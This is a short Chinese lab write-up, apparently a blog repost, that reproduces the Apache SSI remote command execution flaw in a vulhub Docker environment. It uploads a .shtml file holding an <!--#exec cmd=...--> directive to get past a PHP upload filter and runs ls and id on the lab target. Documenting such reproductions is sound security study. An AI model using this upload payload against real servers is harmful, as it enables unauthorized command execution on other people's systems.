首页 > Web开发 > 详细

Apache SSI 远程命令执行漏洞复现

时间:2021-04-02 21:59:31      阅读:34      评论:0      收藏:0      [点我收藏+]

Apache SSI 远程命令执行漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

技术分享图片

查看监听端口

docker-compose ps

技术分享图片

访问http://target_ip:8080/upload.php

技术分享图片

0x02.漏洞介绍

在测试任意文件上传漏洞的时候,目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持,我们可以上传一个shtml文件,并利用<!--#exec cmd="id" -->语法执行任意命令。

0x03.漏洞复现

随意上传一个文件,将文件名后缀改为.shtml,内容为<!--#exec cmd="执行的命令" -->

先用ls尝试一下上传

技术分享图片

访问http://target_ip:8080/shell.shtml成功执行了命令

技术分享图片

再试试id,上传为shel.shtml

技术分享图片

访问http://target_ip:8080/shel.shtml,同样成功执行命令

技术分享图片

Apache SSI 远程命令执行漏洞复现

原文:https://www.cnblogs.com/-Anguvia-/p/14611789.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!